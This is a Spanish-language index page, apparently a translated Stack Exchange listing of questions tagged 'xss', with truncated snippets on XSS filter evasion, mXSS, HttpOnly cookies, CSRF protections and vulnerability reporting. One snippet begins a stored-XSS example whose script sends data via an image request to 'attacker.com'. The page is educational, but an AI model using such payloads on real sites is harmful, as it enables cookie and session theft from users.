Las mejores xss Tus preguntas

3

respuestas

¿Qué es un buen vector XSS sin barras y espacios hacia adelante?

Necesito un vector XSS que no use barras diagonales ni espacios. He revisado listas de cientos de vectores, pero generalmente tienen uno de esos dos. El espacio obtiene la URL codificada, y cualquier cosa después de que se elimine una barra....

hecha 27.12.2013 - 01:31

4

respuestas

¿Es una cookie segura sin la marca HttpOnly un problema?

Entiendo que las cookies con el indicador de seguridad deben transmitirse a través de una conexión HTTPS. También significa que estas cookies deben protegerse de los adversarios (cookie privada). Por lo tanto, es importante establecer la marca H...

hecha 11.04.2017 - 06:29

2

respuestas

¿Cómo se protegen los sitios de Stack Exchange del XSS? [duplicar]

Me parece que debido a que los usuarios pueden publicar preguntas y comentarios en ellos con el código HTML (posiblemente etiquetas <script> ), los sitios de Stack Exchange estarían muy expuestos a los ataques XSS. ¿Cómo se protege...

hecha 30.01.2015 - 20:52

2

respuestas

¿Qué es la mutación XSS (mXSS)?

No pude encontrar ninguna buena documentación ni nada en mXSS. ¿Alguien puede dar alguna información o dar un enlace? Encontré un video y un PDF de la presentación del video: enlace enlace

hecha 11.12.2013 - 16:43

2

respuestas

¿Cómo abordar los problemas de seguridad de XSS en FCKeditor / CKeditor?

Un informe de seguridad que realizamos a través de una empresa externa informó las vulnerabilidades de XSS en FCKeditor que estamos usando en nuestra aplicación PHP. Señalaron que accediendo a URL como: http://www.ourdomain.com/fckeditor/ed...

hecha 05.01.2011 - 13:28

2

respuestas

Tipo 2 XSS vs CSRF

Al tratar de crear una comprensión completa de XSS y CSRF, tengo claro que un tipo 2 xss implica un exploit que es persistente en el servidor. por ejemplo <SCRIPT type="text/javascript"> new Image().src = 'http://www.attacker.com/evil...

hecha 12.05.2013 - 09:10

2

respuestas

¿Qué tan confiable es la función de Validación de Solicitud de ASP.NET?

ASP.NET ofrece una capa adicional para proteger su aplicación de ataques e inyecciones XSS en general, que se llama Validación de solicitud . En su tema oficial, mencionan que: Incluso si está utilizando la validación de solicitudes,...

hecha 26.06.2013 - 23:06

2

respuestas

¿Es suficiente la protección CSRF incorporada de Django?

Django establece un token de protección CSRF en la máquina del usuario a través de una cookie. A continuación, solicita el token en las solicitudes POST. Si estos dos no coinciden, devuelve un 403. Si cambio manualmente tanto la cookie como e...

hecha 17.12.2013 - 20:49

1

respuesta

¿Cómo informar una vulnerabilidad en un sitio que desea llamar al FBI?

Recientemente estuve navegando en un sitio que parecía haber sido diseñado en 2000. Sin embargo, este sitio tiene un buen ranking de Alexa y una comunidad en línea bastante activa. Para la protección del sitio, no daré detalles específicos sobre...

hecha 12.04.2018 - 22:44

3

respuestas

¿Cómo puedo ejecutar un XSS cuando una aplicación web transforma datos en minúsculas a mayúsculas?

Estoy probando una aplicación web, cuando envío datos de entrada a la aplicación web, esto coloca los datos en una función onclick , algo como esto: <a href="#" onclick="someFunction('dataFromServer', '0');">link</a> Pero,...

hecha 17.03.2016 - 20:51

Preguntas con etiqueta 'xss'